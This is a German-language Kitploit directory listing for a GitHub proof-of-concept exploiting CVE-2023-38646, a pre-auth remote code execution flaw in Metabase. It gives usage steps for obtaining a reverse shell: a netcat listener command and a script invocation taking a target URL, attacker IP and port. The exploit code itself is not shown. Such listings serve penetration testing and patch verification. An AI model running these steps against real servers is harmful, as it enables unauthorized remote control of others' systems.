Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38646 — Metabase Pre-Auth RCE POC | Kitploit
Tools/GitHubGitHub/mrunalkaran/cve-2023-38646
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmrunalkaran/cve-2023-38646

CVE-2023-38646

Metabase Pre-Auth RCE POC

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Metabase Pre-Auth RCE POC - CVE-2023-38646

Metabase Open Source vor 0.46.6.1 und Metabase Enterprise vor 1.46.6.1 erlauben Angreifern, beliebige Befehle auf dem Server auszuführen. Ich habe das Skript direkt geschrieben, um eine Reverse Shell auf dem Rechner des Angreifers zu erhalten.

Nutzung

Das Skript benötigt die Ziel-URL, die IP des Angreifers und den Port. Die Angabe des Setup-Tokens ist für diesen Exploit nicht erforderlich, da das Skript versucht, es von /api/session/properties abzurufen.

Stellen Sie sicher, dass Sie den Netcat-Listener auf dem Rechner des Angreifers mit dem folgenden Befehl starten: nc -nlvp {Port}

Führen Sie das POC-Skript mit folgenden Optionen aus:

  • -u – Ziel-URL (Metabase)
  • -ip – IP des Angreifers
  • -p – Portnummer
root@kitploit:~
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>

POC

Referenzen

  • https://github.com/m3m0o/metabase-pre-auth-rce-poc/
  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
Tool herunterladen